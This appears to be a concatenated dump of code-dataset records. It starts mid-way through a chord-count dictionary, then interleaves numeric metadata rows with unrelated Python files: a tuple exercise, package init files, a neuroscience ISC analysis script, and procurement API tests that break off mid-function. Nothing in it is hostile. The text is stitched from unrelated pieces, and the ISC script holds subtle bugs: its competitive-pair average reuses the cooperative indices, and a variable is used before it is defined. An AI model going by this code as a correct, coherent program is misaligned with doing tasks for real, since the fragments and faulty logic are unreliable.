'DsMajor': 1,
'E7': 1,
'C7': 3,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 0,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 1,
'As7': 0,
'F7': 2,
'FMaj7': 3,
'FsDim': 2,
'GDim': 1,
'GMinor': 1,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 3,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 0,
'Am7': 4,
'DsMinor': 0,
},
'DsMinor': {
'AMinor': 0,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 0,
'Em7': 0,
'Dsm7': 3,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 3,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 1,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 2,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 1,
'BMajor': 2,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 1,
'Csm7': 0,
'FsMajor': 2,
'Am7': 0,
'DsMinor': 3,
},
}
| 27.250836 | 300 | 0.31618 | 26,758 | 211,848 | 2.503065 | 0.006989 | 0.007376 | 0.004897 | 0.003359 | 0.87972 | 0.854039 | 0.830987 | 0.787449 | 0.774564 | 0.718142 | 0 | 0.058395 | 0.30554 | 211,848 | 7,773 | 301 | 27.254342 | 0.39686 | 0.000656 | 0 | 0.874392 | 0 | 0 | 0.296291 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.000131 | 0.000131 | 0 | 0.000131 | 0.000131 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9ee4c159f374d576e74fe0988359e134f3b2b15f | 1,291 | py | Python | week-03/05-tuples-and-lists/ex-01-tuples-syntax/program.py | jersson/mit-intro-cs-python | 4c6232209ed47afcea2fb153ff7fc4aedbd21d52 | [
"MIT"
] | null | null | null | week-03/05-tuples-and-lists/ex-01-tuples-syntax/program.py | jersson/mit-intro-cs-python | 4c6232209ed47afcea2fb153ff7fc4aedbd21d52 | [
"MIT"
] | null | null | null | week-03/05-tuples-and-lists/ex-01-tuples-syntax/program.py | jersson/mit-intro-cs-python | 4c6232209ed47afcea2fb153ff7fc4aedbd21d52 | [
"MIT"
] | null | null | null | x = (1, 2, (3, 'John', 4), 'Hi')
eval = x[0]
print(('x[0]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[2]
print(('x[2]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[-1]
print(('x[-1]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[2][2]
print(('x[2][2]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[2][-1]
print(('x[2][-1]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[-1][-1]
print(('x[-1][-1]: {0} value: {1}').format(str(type(eval)), str(eval)))
try:
eval = x[-1][2]
print(('x[-1][2]: {0} value: {1}').format(str(type(eval)), str(eval)))
except:
print('x[-1][2]: <nonetype> value: error')
eval = x[0:1]
print(('x[0:1]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = x[0:-1]
print(('x[0:-1]: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = len(x)
print(('len(x): {0} value: {1}').format(str(type(eval)), str(eval)))
eval = 2 in x
print(('2 in x: {0} value: {1}').format(str(type(eval)), str(eval)))
eval = 3 in x
print(('3 in x: {0} value: {1}').format(str(type(eval)), str(eval)))
try:
eval = x[0] = 8
print(('x[0] = 8: {0} value: {1}').format(str(type(eval)), str(eval)))
except:
print('x[0] = 8: <nonetype> value: error')
# a new comment | 26.895833 | 74 | 0.534469 | 241 | 1,291 | 2.863071 | 0.099585 | 0.113043 | 0.131884 | 0.244928 | 0.765217 | 0.765217 | 0.765217 | 0.765217 | 0.765217 | 0.765217 | 0 | 0.064865 | 0.140201 | 1,291 | 48 | 75 | 26.895833 | 0.556757 | 0.01007 | 0 | 0.121212 | 0 | 0 | 0.285043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.454545 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
733838cfcd20ccc3f6a5d5d73fbceed70a4fce65 | 159 | py | Python | build/lib/vicedtools/gc/__init__.py | gregbreese/vicedtools | 2d32c8ea2437b67b72495e254b71e7f048bd8f9f | [
"Apache-2.0"
] | 2 | 2021-09-23T06:16:49.000Z | 2021-11-02T00:53:22.000Z | build/lib/vicedtools/gc/__init__.py | gregbreese/vicedtools | 2d32c8ea2437b67b72495e254b71e7f048bd8f9f | [
"Apache-2.0"
] | null | null | null | build/lib/vicedtools/gc/__init__.py | gregbreese/vicedtools | 2d32c8ea2437b67b72495e254b71e7f048bd8f9f | [
"Apache-2.0"
] | null | null | null | from vicedtools.gc.format import create_student_details_gc_csv
from vicedtools.gc.upload import upload_student_details, upload_reports, upload_reports_summary
| 53 | 95 | 0.899371 | 23 | 159 | 5.826087 | 0.521739 | 0.208955 | 0.238806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062893 | 159 | 2 | 96 | 79.5 | 0.899329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
733c7bfe501ba3b39ca945cdb02968067248ef28 | 201 | py | Python | docker/dockerfile/genie-parser/docker_app_run/modules/kafka_stream/__init__.py | btr1975/automation-framework | b0ba661cb6bae193bd5c6531c08d9dba55c4099e | [
"MIT"
] | 8 | 2021-06-02T23:08:40.000Z | 2022-02-11T16:50:24.000Z | docker/dockerfile/genie-parser/docker_app_run/modules/kafka_stream/__init__.py | btr1975/automation-framework | b0ba661cb6bae193bd5c6531c08d9dba55c4099e | [
"MIT"
] | null | null | null | docker/dockerfile/genie-parser/docker_app_run/modules/kafka_stream/__init__.py | btr1975/automation-framework | b0ba661cb6bae193bd5c6531c08d9dba55c4099e | [
"MIT"
] | 2 | 2021-09-30T14:46:03.000Z | 2021-11-14T23:47:35.000Z | """
init for the kafka_consumers module
"""
from .consume_requests import consume_requests
from .consume_requests_threaded import consume_requests_threaded
from .consume_results import consume_results
| 28.714286 | 64 | 0.860697 | 26 | 201 | 6.307692 | 0.461538 | 0.365854 | 0.231707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094527 | 201 | 6 | 65 | 33.5 | 0.901099 | 0.174129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b4048e2dd7127c16fc894f221c380c956a8ae5ce | 15,721 | py | Python | cooperative_isc.py | joechen018/social-ctf | 64d5eb7cbb55c5d67326e168bae4c38576c735d8 | [
"Apache-2.0"
] | null | null | null | cooperative_isc.py | joechen018/social-ctf | 64d5eb7cbb55c5d67326e168bae4c38576c735d8 | [
"Apache-2.0"
] | 1 | 2021-04-19T22:54:40.000Z | 2021-04-19T22:54:40.000Z | cooperative_isc.py | joechen018/social-ctf | 64d5eb7cbb55c5d67326e168bae4c38576c735d8 | [
"Apache-2.0"
] | 4 | 2021-01-15T19:01:35.000Z | 2021-09-24T20:18:38.000Z | import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
from brainiak.isc import isc
from statsmodels.stats.multitest import multipletests
from statistical_tests import bootstrap_test, fisher_mean
from coupling_metrics import lagged_isc
# Load in PCA-reduced LSTMS
k = 100
lstms_pca = np.load(f'results/lstms_tanh-z_pca-k{k}.npy')
# Compute simple ISC and save
n_matchups = 4
n_repeats = 8
n_players = 4
n_pairs = n_players * (n_players - 1) // 2
iscs = np.full((n_matchups, n_repeats, n_pairs, k), np.nan)
for matchup in np.arange(n_matchups):
for repeat in np.arange(n_repeats):
lstms_rep = np.moveaxis(lstms_pca[matchup, repeat], 0, 2)
iscs[matchup, repeat] = isc(lstms_rep, pairwise=True)
print("Finished computing ISC for"
f"matchup {matchup} repeat {repeat}")
np.save(f'results/iscs_tanh-z_pca-k{k}.npy', iscs)
# Plot cooperative/competitive ISC for top 10 PCs
matchup = 0
n_repeats = 8
pcs = np.arange(10)
sns.set_context('notebook', font_scale=1.2)
fig, axs = plt.subplots(2, 5, figsize=(25, 8))
for pc, ax in zip(pcs, axs.ravel()):
corr = fisher_mean([np.corrcoef(lstms_pca[matchup, r, ..., pc])
for r in np.arange(n_repeats)], axis=0)
sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,
cmap='RdBu_r', xticklabels=False, yticklabels=False,
fmt='.2f', ax=ax)
ax.set_title(f'PC{pc + 1}')
plt.savefig(f'figures/isc_coop-comp_tanh-z_pca-k{k}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Difference in cooperative/competitive ISC across PCs
matchup = 0
n_repeats = 8
n_pcs = 100
# Compute differences between cooperative and competitive ISCs
isc_diffs = []
isc_diffs_df = {'difference': [], 'PC': [], 'repeat': []}
for pc in np.arange(n_pcs):
corrs = [np.corrcoef(lstms_pca[matchup, r, ..., pc])
for r in np.arange(n_repeats)]
diffs = [np.mean(c[[0, 3], [1, 2]]) - np.mean(c[0:2, 2:4])
for c in corrs]
isc_pc_diffs = []
for r, diff in enumerate(diffs):
isc_diffs_df['difference'].append(diff)
isc_diffs_df['PC'].append(pc + 1)
isc_diffs_df['repeat'].append(r)
isc_pc_diffs.append(diff)
isc_diffs.append(isc_pc_diffs)
isc_diffs_df = pd.DataFrame(isc_diffs_df)
isc_diffs = np.array(isc_diffs).T
# Bootstrap test for significance of difference
observed, ci, p, distribution = bootstrap_test(isc_diffs,
bootstrap_axis=0,
n_bootstraps=1000,
estimator=fisher_mean,
ci_percentile=95,
side='two-sided')
# FDR correction of p-values
_, fdr_p, _, _ = multipletests(p, method='fdr_bh')
# Plot ISCs for 100 PCs with significance markers
sig_pos = ((fdr_p < .05) & (observed > 0)).nonzero()[0]
sig_neg = ((fdr_p < .05) & (observed < 0)).nonzero()[0]
sns.set_context('notebook', font_scale=1.2)
fig, ax = plt.subplots(figsize=(16, 4))
sns.barplot(x='PC', y='difference', data=isc_diffs_df, ax=ax, color='.6',
estimator=fisher_mean)
#ax.set_ylim(-.375, .325) # for matchup = 3 (sig y = -.01)
ax.set_ylim(-.3, 1) # for matchup = 0
ax.set_xticks([0, 19, 39, 59, 79, 99])
for sig_pc in sig_pos:
ax.annotate('.', (sig_pc, -.02), color='tab:red', size=40,
xycoords=('data', 'axes fraction'),
ha='center', va='bottom')
for sig_pc in sig_neg:
ax.annotate('.', (sig_pc, -.02), color='tab:blue', size=40,
xycoords=('data', 'axes fraction'),
ha='center', va='bottom')
ax.set_ylabel('cooperative – competitive ISC')
ax.set_title(f'difference in cooperative vs. competitive ISC for 100 PCs');
sns.despine()
plt.savefig(f'figures/isc_diff-bars_tanh-z_pca-k{k}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Load in PCA-reduced LSTMs with confounds regressed out
reg = 'com' # 'pre', 'hud', 'act', or 'com'
lstms_pca_reg = np.load(f'results/lstms_tanh-z_pca-k{k}_reg-{reg}.npy')
# Compute simple ISC and save
n_matchups = 4
n_repeats = 8
n_players = 4
n_pairs = n_players * (n_players - 1) // 2
iscs = np.full((n_matchups, n_repeats, n_pairs, k), np.nan)
for matchup in np.arange(n_matchups):
for repeat in np.arange(n_repeats):
lstms_rep = np.moveaxis(lstms_pca_reg[matchup, repeat], 0, 2)
iscs[matchup, repeat] = isc(lstms_rep, pairwise=True)
print("Finished computing ISC for"
f"matchup {matchup} repeat {repeat}")
np.save(f'results/iscs_tanh-z_pca-k{k}_reg-{reg}.npy', iscs)
# Plot cooperative/competitive ISC for top 10 PCs
matchup = 0
n_repeats = 8
pcs = np.arange(10)
sns.set_context('notebook', font_scale=1.2)
fig, axs = plt.subplots(2, 5, figsize=(25, 8))
for pc, ax in zip(pcs, axs.ravel()):
corr = fisher_mean([np.corrcoef(lstms_pca_reg[matchup, r, ..., pc])
for r in np.arange(n_repeats)], axis=0)
sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,
cmap='RdBu_r', xticklabels=False, yticklabels=False,
fmt='.2f', ax=ax)
ax.set_title(f'PC{pc + 1}')
plt.savefig(f'figures/isc_coop-comp_tanh-z_pca-k{k}_reg-{reg}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Compute differences between cooperative and competitive ISCs
matchup = 0
n_repeats = 8
n_pcs = 100
isc_diffs, isc_coops = [], []
isc_diffs_df = {'difference': [], 'PC': [], 'repeat': []}
for pc in np.arange(n_pcs):
corrs = [np.corrcoef(lstms_pca_reg[matchup, r, ..., pc])
for r in np.arange(n_repeats)]
coops = [np.mean(c[[0, 3], [1, 2]]) for c in corrs]
diffs = [np.mean(c[[0, 3], [1, 2]]) - np.mean(c[0:2, 2:4])
for c in corrs]
isc_coops.append(coops)
isc_diffs.append(diffs)
isc_pc_diffs = []
for r, diff in enumerate(diffs):
isc_diffs_df['difference'].append(diff)
isc_diffs_df['PC'].append(pc + 1)
isc_diffs_df['repeat'].append(r)
isc_pc_diffs.append(diff)
isc_diffs_df = pd.DataFrame(isc_diffs_df)
isc_coops = np.array(isc_coops).T
isc_diffs = np.array(isc_diffs).T
# Get PCs with largest difference between cooperative/competitive
n_top = 10
isc_diff_means = fisher_mean(isc_diffs, axis=0)
top_diffs = np.argpartition(isc_diff_means, -n_top)[-n_top:]
top_diffs = top_diffs[np.argsort(isc_diff_means[top_diffs])[::-1]]
# Get PCs with largest cooperative ISC (irrespective of competitive ISC)
n_top = 10
isc_coop_means = fisher_mean(isc_coops, axis=0)
top_coops = np.argpartition(isc_coop_means, -n_top)[-n_top:]
top_coops = top_coops[np.argsort(isc_coop_means[top_coops])[::-1]]
# Find overlap between top PCs
top_both = list(set(top_diffs) & set(top_coops))
# For matchup 0: [2, 7, 9, 23, 24]
# Bootstrap test for significance of difference
observed, ci, p, distribution = bootstrap_test(isc_diffs,
bootstrap_axis=0,
n_bootstraps=1000,
estimator=fisher_mean,
ci_percentile=95,
side='two-sided')
# FDR correction of p-values
_, fdr_p, _, _ = multipletests(p, method='fdr_bh')
# Plot ISCs for 100 PCs with significance markers
sig_pos = ((fdr_p < .05) & (observed > 0)).nonzero()[0]
sig_neg = ((fdr_p < .05) & (observed < 0)).nonzero()[0]
sns.set_context('notebook', font_scale=1.2)
fig, ax = plt.subplots(figsize=(16, 4))
sns.barplot(x='PC', y='difference', data=isc_diffs_df, ax=ax, color='.6',
estimator=fisher_mean)
#ax.set_ylim(-.375, .325) # for matchup = 3
ax.set_ylim(-.3, 1) # for matchup = 0
ax.set_xticks([0, 19, 39, 59, 79, 99])
for sig_pc in sig_pos:
ax.annotate('.', (sig_pc, -.02), color='tab:red', size=40,
xycoords=('data', 'axes fraction'),
ha='center', va='bottom')
for sig_pc in sig_neg:
ax.annotate('.', (sig_pc, -.02), color='tab:blue', size=40,
xycoords=('data', 'axes fraction'),
ha='center', va='bottom')
ax.set_ylabel('cooperative – competitive ISC')
ax.set_title(f'difference in cooperative vs. competitive ISC for 100 PCs');
sns.despine()
plt.savefig('figures/isc_diff-bars_tanh-z_'
f'pca-k{k}_reg-{reg}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Zoom in and replot to highlight top PCs
from matplotlib.patches import Patch
colors = np.array(['.7'] * k, dtype='object')
colors[top_coops] = 'tab:red'
colors[top_diffs] = 'tab:blue'
colors[top_both] = 'tab:purple'
np.save('figures/colors_top-bars_tanh-z_'
f'pca-k{k}_reg-{reg}_m{matchup}.npy', colors)
sns.set_context('notebook', font_scale=1.2)
fig, ax = plt.subplots(figsize=(16, 4))
sns.barplot(x='PC', y='difference', data=isc_diffs_df, ax=ax, color='.6',
estimator=fisher_mean, palette=colors)
#ax.set_ylim(-.375, .325) # for matchup = 3
ax.set_ylim(-.05, .4) # for matchup = 0
ax.set_xticks([0, 19, 39, 59, 79, 99])
ax.set_ylabel('cooperative – competitive ISC')
ax.set_title(f'difference in cooperative vs. competitive ISC for 100 PCs')
sns.despine()
legend_elements = [Patch(facecolor='tab:red'),
Patch(facecolor='tab:blue'),
Patch(facecolor='tab:purple'),
Patch(facecolor='tab:purple')]
ax.legend(handles=legend_elements, loc='upper right',
labels=['', '', 'top 10 cooperative PCs',
'top 10 difference PCs'],
ncol=2, handletextpad=0.5, handlelength=1.0, columnspacing=-0.5)
plt.savefig('figures/isc_top-bars_tanh-z_'
f'pca-k{k}_reg-{reg}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Plot cooperative/competitive ISC for top 10 PCs
matchup = 0
n_repeats = 8
pcs = top_both
fig, axs = plt.subplots(1, 5, figsize=(18, 8))
for pc, ax in zip(pcs, axs.ravel()):
corr = fisher_mean([np.corrcoef(lstms_pca_reg[matchup, r, ..., pc])
for r in np.arange(n_repeats)], axis=0)
sns.heatmap(corr, square=True, annot=True, vmin=-1, vmax=1,
cmap='RdBu_r', xticklabels=False, yticklabels=False,
fmt='.2f', ax=ax, cbar_kws={'shrink': .32})
ax.set_title(f'PC{pc + 1}')
plt.savefig(f'figures/isc_top-coop_tanh-z_pca-k{k}_reg-{reg}_m{matchup}.png',
dpi=300, bbox_inches='tight')
# Lagged ISC for selected PCs
matchup = 0
n_repeats = 8
n_lags = 900
pc_ids = np.arange(10)
# Compute lagged ISC for each repeat
lagged_iscs = []
for repeat in np.arange(n_repeats):
# Slicing with array seems to shift axis?
lstms_rep = np.moveaxis(lstms_pca[matchup, repeat, ..., pc_ids], 2, 0)
lagged_rep, lags = lagged_isc(lstms_rep, n_lags=n_lags, circular=True)
lagged_iscs.append(lagged_rep)
print(f"Finished computing lagged ISC for repeat {repeat}")
lagged_iscs = np.stack(lagged_iscs, axis=0)
# Get lagged ISCs for cooperative pairs
coop_ids, comp_ids = [0, 5], [1, 2, 3, 4]
lagged_coop = np.mean(lagged_iscs[:, coop_ids, ...], axis=1)
lagged_comp = np.mean(lagged_iscs[:, coop_ids, ...], axis=1)
# Bootstrap test to assess significance
observed, ci, ps, distribution = bootstrap_test(lagged_coop,
bootstrap_axis=0,
n_bootstraps=1000,
estimator=fisher_mean,
ci_percentile=95,
side='right')
# FDR correction across lags
fdr_ps = []
for p in ps:
_, fdr_p, _, _ = multipletests(p, method='fdr_bh')
fdr_ps.append(fdr_p)
fdr_ps = np.array(fdr_ps)
# Plot lagged ISC with significance indicator
n_rows, n_cols = 5, 2
fig, axs = plt.subplots(n_rows, n_cols, figsize=(9, 8))
pc_ids = np.arange(10)
threshold = .02
sig_ids = (fdr_ps[pc_id] <= threshold).nonzero()[0]
for i, (pc_id, ax) in enumerate(zip(pc_ids, axs.ravel())):
ax.plot(lags, np.concatenate(lagged_iscs[:, coop_ids, pc_id]).T,
color='.8', alpha=.5, zorder=1);
ax.plot(lags, np.mean(lagged_coop[:, pc_id, :], axis=0),
color='.4', zorder=2);
if i not in [8, 9]:
ax.xaxis.set_ticks([])
else:
ax.set_xticks(lags[::15 * 10])
ax.set_xticklabels(np.unique(lags // 15)[::10])
ax.set_xlabel('lag (seconds)')
if i % 2 != 0:
ax.yaxis.set_ticks([])
ax.set_ylim(-.3, .7)
ax.set_xlim(-n_lags, n_lags)
ax.set_title(f'PC{pc_id + 1} cooperative ISC',
loc='left', va='top', x=.02, y=.95)
sns.despine()
plt.tight_layout()
plt.savefig('figures/isc_lag-60s_tanh-z_'
f'pca-k{k}_m{matchup}.png',
dpi=300, bbox_inches='tight')
#plt.scatter(lags[sig_ids], np.mean(lagged_coop[:, pc_id], axis=0)[sig_ids],
# color='tab:red', marker='.', zorder=3)
# Load in PCA-reduced LSTMs with confounds regressed out
reg = 'com' # 'pre', 'hud', 'act', or 'com'
lstms_pca_reg = np.load(f'results/lstms_tanh-z_pca-k{k}_reg-{reg}.npy')
# Lagged ISC for selected PCs
matchup = 0
n_repeats = 8
n_lags = 900
pc_ids = np.arange(10)
# Compute lagged ISC for each repeat
lagged_iscs = []
for repeat in np.arange(n_repeats):
# Slicing with array seems to shift axis?
lstms_rep = np.moveaxis(lstms_pca_reg[matchup, repeat, ..., pc_ids], 2, 0)
lagged_rep, lags = lagged_isc(lstms_rep, n_lags=n_lags, circular=True)
lagged_iscs.append(lagged_rep)
print(f"Finished computing lagged ISC for repeat {repeat}")
lagged_iscs = np.stack(lagged_iscs, axis=0)
# Get lagged ISCs for cooperative pairs
coop_ids, comp_ids = [0, 5], [1, 2, 3, 4]
lagged_coop = np.mean(lagged_iscs[:, coop_ids, ...], axis=1)
lagged_comp = np.mean(lagged_iscs[:, coop_ids, ...], axis=1)
# Bootstrap test to assess significance
observed, ci, ps, distribution = bootstrap_test(lagged_coop,
bootstrap_axis=0,
n_bootstraps=1000,
estimator=fisher_mean,
ci_percentile=95,
side='right')
# FDR correction across lags
fdr_ps = []
for p in ps:
_, fdr_p, _, _ = multipletests(p, method='fdr_bh')
fdr_ps.append(fdr_p)
fdr_ps = np.array(fdr_ps)
# Plot lagged ISC with significance indicator
n_rows, n_cols = 5, 2
fig, axs = plt.subplots(n_rows, n_cols, figsize=(9, 8))
pc_ids = np.arange(10)
threshold = .02
sig_ids = (fdr_ps[pc_id] <= threshold).nonzero()[0]
for i, (pc_id, ax) in enumerate(zip(pc_ids, axs.ravel())):
ax.plot(lags, np.concatenate(lagged_iscs[:, coop_ids, pc_id]).T,
color='.8', alpha=.5, zorder=1);
ax.plot(lags, np.mean(lagged_coop[:, pc_id, :], axis=0),
color='.4', zorder=2);
if i not in [8, 9]:
ax.xaxis.set_ticks([])
else:
ax.set_xticks(lags[::15 * 10])
ax.set_xticklabels(np.unique(lags // 15)[::10])
ax.set_xlabel('lag (seconds)')
if i % 2 != 0:
ax.yaxis.set_ticks([])
ax.set_ylim(-.3, .7)
ax.set_xlim(-n_lags, n_lags)
ax.set_title(f'PC{pc_id + 1} cooperative ISC',
loc='left', va='top', x=.02, y=.95)
sns.despine()
plt.tight_layout()
plt.savefig('figures/isc_lag-60s_tanh-z_'
f'pca-k{k}_reg-{reg}_m{matchup}.png',
dpi=300, bbox_inches='tight')
#plt.scatter(lags[sig_ids], np.mean(lagged_coop[:, pc_id], axis=0)[sig_ids],
# color='tab:red', marker='.', zorder=3)
| 37.70024 | 78 | 0.61561 | 2,403 | 15,721 | 3.84561 | 0.117769 | 0.016232 | 0.016232 | 0.015475 | 0.856725 | 0.853804 | 0.846878 | 0.828806 | 0.822963 | 0.815821 | 0 | 0.035207 | 0.233955 | 15,721 | 416 | 79 | 37.790865 | 0.731877 | 0.126264 | 0 | 0.807571 | 0 | 0.006309 | 0.137679 | 0.052397 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028391 | 0 | 0.028391 | 0.012618 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b41637c43f467ec652247da08a951f9811808630 | 4,806 | py | Python | openprocurement/tender/openua/tests/question_blanks.py | raccoongang/openprocurement.tender.openua | dd2dbddf317bdb4bb38443240faf126765ef48c4 | [
"Apache-2.0"
] | 8 | 2016-01-28T11:37:09.000Z | 2019-03-17T07:18:09.000Z | openprocurement/tender/openua/tests/question_blanks.py | raccoongang/openprocurement.tender.openua | dd2dbddf317bdb4bb38443240faf126765ef48c4 | [
"Apache-2.0"
] | 70 | 2016-02-11T16:46:22.000Z | 2018-03-19T15:42:16.000Z | openprocurement/tender/openua/tests/question_blanks.py | raccoongang/openprocurement.tender.openua | dd2dbddf317bdb4bb38443240faf126765ef48c4 | [
"Apache-2.0"
] | 30 | 2016-01-27T10:51:00.000Z | 2019-03-31T15:56:52.000Z | # -*- coding: utf-8 -*-
from openprocurement.tender.belowthreshold.tests.base import (
test_organization
)
# TenderQuestionResourceTest
def create_tender_question(self):
response = self.app.post_json('/tenders/{}/questions'.format(
self.tender_id),
{'data': {'title': 'question title', 'description': 'question description', 'author': test_organization}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
question = response.json['data']
self.assertEqual(question['author']['name'], test_organization['name'])
self.assertIn('id', question)
self.assertIn(question['id'], response.headers['Location'])
self.go_to_enquiryPeriod_end()
response = self.app.post_json('/tenders/{}/questions'.format(
self.tender_id),
{'data': {'title': 'question title', 'description': 'question description', 'author': test_organization}},
status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can add question only in enquiryPeriod")
self.set_status('active.auction')
response = self.app.post_json('/tenders/{}/questions'.format(
self.tender_id),
{'data': {'title': 'question title', 'description': 'question description', 'author': test_organization}},
status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], "Can add question only in enquiryPeriod")
# TenderLotQuestionResourceTest
def tender_has_unanswered_questions(self):
question_id = self.create_question_for("tender", self.tender_id)
self.set_status('active.auction', {'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.tendering')
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(self.tender_id, self.tender_token), {'data': {
'reason': 'cancellation reason',
'status': 'active',
}})
self.assertEqual(response.status, '201 Created')
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.json['data']['status'], 'cancelled')
def lot_has_unanswered_questions(self):
question_id = self.create_question_for("lot", self.initial_lots[0]['id'])
self.set_status('active.auction', {'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.tendering')
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(self.tender_id, self.tender_token), {'data': {
'reason': 'cancellation reason',
'status': 'active',
"cancellationOf": "lot",
"relatedLot": self.initial_lots[0]['id']
}})
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'unsuccessful')
def item_has_unanswered_questions(self):
items = self.app.get('/tenders/{}'.format(self.tender_id)).json['data']['items']
question_id = self.create_question_for("item", items[0]['id'])
self.set_status('active.auction', {'status': 'active.tendering'})
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.assertEqual(response.json['data']['status'], 'active.tendering')
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json('/tenders/{}/cancellations?acc_token={}'.format(self.tender_id, self.tender_token), {'data': {
'reason': 'cancellation reason',
'status': 'active',
"cancellationOf": "lot",
"relatedLot": self.initial_lots[0]['id']
}})
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('chronograph', ''))
